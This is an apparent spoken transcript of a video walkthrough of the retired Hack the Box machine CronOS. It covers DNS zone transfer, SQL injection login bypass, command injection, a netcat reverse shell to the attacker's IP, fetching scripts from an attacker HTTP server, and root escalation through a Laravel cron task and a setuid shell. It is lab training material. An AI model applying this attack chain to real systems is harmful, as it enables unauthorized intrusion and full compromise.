Hey guys, the Hack the Box team has retired CronOS, which happens to be one of my favorite boxes because it's not really that challenging. You know exactly what to do at every step, but every step requires you to think a little bit, which is awesome. This is it. Let's jump into the box. Like all boxes, we have to start with nmapping. So nmap-sc, save scripts, sv, enumerate versions, oa, output all formats, give it a name like nmap, and then the IP address, which is 10.10.10.13. I'm not going to run this because it takes time. Instead, I have all the output saved. So let's just less that file, nmap.nmap, and we can see what is listening. We have port 22, SSH, 53, which is DNS. Odd that's on TCP. Normally DNS is UDP. And then port 80, which is HTTP. We know most about HTTP, so that's the first thing I'm going to go to. So 10.10.10.13. We get the Apache-Ubuntu default page. When you see this Apache default page, generally there's a misconfiguration somewhere or you're just not going down the right route. So what I'm going to do is turn intercept on, refresh the page, and then change this host value to be the host name of the box, which is cronos.htb. You know that from the admin panel of Hack the Box. So when we forward this request and then go back to our Firefox, we do see CronOS. And if this didn't work, then I'd fire up dirbuster against the IP address and see if there's any hidden files or things like that. Going to these URLs, we see .com/docs for Laravel. This is outside the Hack the Box domain, so out of scope. Laracast, outside the domain. News, again, they're linking me off of 10.10.10.13 or cronos.htb, which means they're out of scope. I don't want to try to attack laravel.com, which is a PHP framework. Glancing at the source, I don't see anything of interest. So what I'm going to do now is edit my host file to put 10.10.10.13 and cronos.htb in it. Save that. And now I don't have to edit the packet. I can just go to it by domain name. So I'm going to open up dirbuster. Enter my target URL. Let's put this at, I guess, that's fine, 50 some threads. And then we have to go to user share wordless dirb, and I want dirbuster, I think. Dirbuster has better list. I'll do directory list 2.3 medium. I disable be recursive because I like this to finish sometime today, and this should be fine. I'm going to start this up and let this run in the background while I do some other things. So we did see that DNS was listening on this box. So we're going to do ns lookup and change our server to be 10.10.10.13. And we can do the IP address. And we see that resolves to ns1.cronos.htb. If you wanted to, you could also just do cronos.htb, and you'd see its hostname that way, just in case you didn't have access to the web portal and got the hostname that way. The next thing I check is to do DNS zone transfer records to see if it's configured where we can do a zone transfer. And the reason why I'm trying this first is because zone transfers require DNS TCP. They're what DNS servers use to transfer entire zones to go like master-slave configurations. I have a horrible time explaining this right now, but let's just try it. So dig axfr is the command, 10.10.10.13, and we're going to transfer the cronos.htb zone. Hope this is correct. And it is. So we see a few more subdomains. We have admin.cronos, ns1, which we saw earlier, www, and then just the regular default. Going back into dirbuster, do we see anything? Nope, not really. So let's edit our host file to add the new domain names. os.htb and admin.cronos.htb. Okay, save that. And now we can go to the URLs. www is the same, ns1, default Apache, so HTTP or Apache is not configured for ns1.cronos.htb. Let's see admin. And we get a user panel. So let's just try admin password, admin, and I'll do it in burp so you can see it because it's masking passwords. Submit. We'll do a common SQL injection. URL encode this. Forward this off. And nothing. So the next thing I'm going to do is try to SQL map this. So admin, submit, copy, and then create the login request. And we'll be able to point SQL map at this login request. And I like doing it this way just because you don't have to worry about giving it a bunch of flags to change the user agent, put in a post request, send data. It becomes really easy when you can just do SQL map -r login request. Super simple. And then we'll let this run. In just a few seconds, we should get a response back. But while that's going, check Dirbuster. Nothing new, and it's still going because we see 13 minutes, no error messages, and the first thing comes back from SQL Map. SQL Map got a 302 redirect to welcome.php. If we try to log in, send this to repeater, it's not sending a redirect, which means something good happened with SQL Map. So do we want to follow it? Yeah. Received a post request, send original posted date and new location? I guess so. But the key thing to look at is, I guess it was doing union injection at the time. But key thing to look at is we're doing user injection at this point when it detected that. So while SQL map's running, let us try doing something in the user. So, and the parameter, actually I have to drop this request. So admin, doesn't matter what's there. So, and that parameter, and we'll send a comment. Click submit, and we get in. So the username was SQL injection, and awesome. So net tool, we have ping and traceroute. Let us just try basic command injection, put a semicolon, who am I, click execute, and see what happens. And we should have done that in burp, so what we'll do, HTTP history, get that last one. We can see the response now. Ping. We see www-data, so it looks like we did get command injection. So we have the ping output and then www-data. Awesome. So send this over to repeater to see what the request looks like. And send it again so you can see. The interesting thing is, it looks like we have command injection in the command as well. So both these parameters are command injectable, and this developer should just be shot. So let us verify what we think. Let's just change command to be who am I? And we still get date, the user. We can change date, and we see, yeah, it is definitely doing command injection. So next thing, let's Google pen test monkey. Reverse shell cheat sheet. So I don't have Firefox configured to use my burp certificate yet, so let's do that. CA, save file, preferences, security, No. Advanced certificates. View. Servers. Authorities. I think it's authorities. Downloads. CA cert. Trust to identify websites. Yep. There we go. Now my browser is no longer complaining about burp. Reverse shell cheat sheet. We'll try this first one, that's bash. So do it ifconfig. And that's odd. SQL map did not say there was SQL injection. So nc lvnp will listen on 8081. Our IP is 10.10.15.28. So go to burp, paste that command. 10.10.15.28, I think. Yep. Change this to be 8081. URL encode. And I'm just pressing Control U to do that quickly instead of right-clicking and doing it. And we don't get anything. So this one didn't work. And we could just go down the line to try. The second one I normally try is this one. Because a lot of these boxes have NC on them. They just don't have the version of NC which allows you to use an argument to give a file. So we can do which NC. Yes, we do have it. So do this. 10, 10, 10, 15, 28, and port 8081. When we go to run this, that should have worked. Oh, URL encode. So highlight, URL encode, go, and we get a shell. So first things first, let's get us a real shell. So python-c import pty, pty.spawn bin bash. Okay. I'm going to background this, stty raw minus echo foreground. Term variable not set, so let's env. What is my term variable? It should just be xterm-256 echo. Screen? Is that it? Okay, so term is screen. And that's probably because I'm in tmux right now. So export term equals screen. And now I can use clear. Awesome. And it just dawned on me that I didn't explain what I was doing. What I was doing is just getting a pseudo terminal that allows me to do tab auto completion. So it started off with me pressing Control Z to background a process. Then I typed stty raw minus echo, which told my terminal not to process special characters like tabs, and instead just send them right on through to the next terminal, which is that Python TTY session, listening on the remote box. And when I combine those two, it lets me do those special characters. But the next step is back on our local box, and I'm going to rename this to be web server because that's what we're going to do. We got to run a few privesc scripts to identify common ways to privesc. So I have scripts in opt Linux privesc. Opt is just where I throw scripts and stuff I download, and I try to stay organized. So these are three I use: linenum, Linux priv checker, and Unix privesc.sh. You can just Google all those and download them. I'm going to do python-m simple HTTP server to start up something. Background of this process, type ifconfig, get my IP. It is 10.10.15.28, and then foreground it. So now I can go to dev shm. Let's create .ip. And dev shm is RAM disk, which means if the server reboots, all the files get deleted, so I don't have to worry about cleaning up. So wget, I think -r is recursive. We'll find out. 10.10.15.28, port 8000. No. Is it? There we go. dash lowercase r is recursive, and it put it in a folder. That's fine. So now we can run these scripts. So we'll start off with lin.enum.sh. Scroll up as this goes. And as I'm scrolling, I notice something really odd right now. Is there's a cron tab that runs every minute by the user root, and it's running a Laravel command, which is a PHP framework that we saw earlier at the web page, and schedule run. So my guess would be if we can get Laravel to execute a command by sending it a scheduled task, we'll be able to get code execution. Awesome. So that's where I'm going to start my search. First, let's copy this. And we can stop the enumeration because we have an idea of what to do. No schedule commands to run. So now we have to go to trusty Google and search how to do commands. So let's do Laravel create schedule command. Laravel docs are always entertaining, or just docs are always good. I don't know why I said that. And then easylaravelbook.com. That sounds good. So the first thing it's doing, scrolling, what's the command? Wants us to run Inspire. Not sure what Inspire is. Create your own commands by the make console generator. We may want to come back into this. Scheduling command. This is probably what we want to do. So we edit the app console kernel.php file, find this protected function, and schedule a command. So this is scheduling a command that we created up here. But we can go over to the Laravel docs just to look over to see if there's other ways we can define commands. So this is defining schedules. We don't care about that. Schedule frequency, every minute. That's definitely going to be useful. Still searching. Time constraints, running task, maintenance, task output, task hooks. Did I miss something? Nope. So go back. Let's see. Schedule command, terminal, shell, bash. Does this work? Artisan list. Calling commands outside of the CLI. Scheduling commands. Scheduling terminal commands. So we want to do schedule to exec, composer, self-update. So this is running the bash command composer self-update every day. So combining these two pages, we should be able to get a Laravel task created. So first things first, we have to find that file, kernel.php. So we're going to do find /-name, and then output errors to the bin bucket. Shouldn't take too long to find. We do see it in var www laravel app console kernel.php, app console kernel.php. That looks like what we want. So we're going to go into that directory and edit it. So we want to find that protected function section. And right here, function schedule. So let's create one. So it was schedule to exec. And let's see, what do we want to do? Let's just touch/temp ipsec. And the reason I'm doing this is just to see what user I'm running under. And we want to do it to every minute. I think that's how it did it. I guess we'll find out. Write this. Date. So we have 40 seconds. So let's see. Hourly. We need open close parentheses. Minute. If I could type. There we go. Okay, so in about 20 seconds, it should write to temp ipsec, and if it's root, we know we got running commands as root. Man, why'd I stumble so hard on that? 53 seconds. 58 seconds, so ls-la, let us hope for ipsec. And we do see ipsec, and we see root. Awesome. So we're going to go dev shm and compile a TTY shell, setuid shell. So check if GCC, it's not installed. Let's see, is this 64-bit? Yes, it is. So we can go back to our web server. We can stop this. Yeah, we'll just trying to figure out how to stay organized. Don't mind me. So documents, HTB, and this is CronOS. Boxes, CronOS. Okay. So we have to create a setuid program. To do that, it's just a C file, int main void. Crap. Then we want to set UID to 0, set GID to 0, and then run system bin bash. Close this. Compile. So GCC set UID output. We'll call this set. Call it ipsec. /ipsec. Make sure it runs. Looks good. So now we have to send this over. So again, python-m simple HTTP server. Go back to our shell. wget. We can use curl. Curl 10, 10, 15, 28, 8000. Ipsec. Call it ipsec. Done. So lsla. It's not executable. So let's make it executable. And /ipsec. Good, it runs. So now for this program to work is we have to give it the sticky bit and change it to root. Or not sticky bit. We have to give it the SUID bit and then change the owner to root. So cd /var. Okay. So what we're going to do, change our touch command to be chown root temp ipsec and chmod 4755 on temp ipsec. The 4, this is the set UID bit, read, write, execute, read, execute, read, execute. Okay. And now we wait for the new minute, and looks like we had just literally missed it. Yep, so now we're stuck at a waiting game for another minute for that cron to run. Let's see, can I set the date? 3:35:58. Done. Only root can set date. I was hoping to speed up the cron. 33 seconds left, so in about 30 seconds that cron will run, and then we should be able to jump to root. Check date again. So 10 seconds, so sleep, 10, ls-la, and when this finishes, we will have root. Any second, there we go, and we don't. Oh crap, I did temp ipsec, not dev shm. So now we have to go back and do that all over again. cd var laravel v kernel dev shm. Okay. Date 35 seconds. So if we do ls-la on temp, we do see the sticky bit is now set on ipsec. The only problem is there's no file there, 0 bytes. So if I had made that writable by everyone, chances are we wouldn't have to wait this minute again. But I did not. cd dash, if you don't know, dash is previous directory. So dev shm, back to console. So, little handy trick. And now we have the sticky bit, root owns it on this. So when we do /ipsec, then ID, we should have been root. We are not root. It ran. Check mount permissions. Grep dev. Let's see. Where's dev? There it is. So dev is actually mounted no set UID. So we can't do the file there. So back to waiting a minute. Kernel, let's just chown root. We can just cp this file to /temp, and we'll just move it actually. Hopefully it doesn't ask to overwrite. Check date. 40 seconds left. So the no set UID bit means anything in that mount can't use that set UID function. So since that was set on dev and there's no like dev shm in the mount, well, the net no set UID bit is set and it breaks that. So it shouldn't be set on mount, on slash, which is where mount is. So let's check. That's boot. Sued. CFS dev mapper. Here we go. So this is what /temp falls under, and we don't have no set UID. So this time it should work. LA. So now we see stuff has written to that file, /ipsec, ID, and we are root. So we can go in the root directory, and if we wanted to, read that file. So hope you guys enjoyed this video. Take care, and have a good night.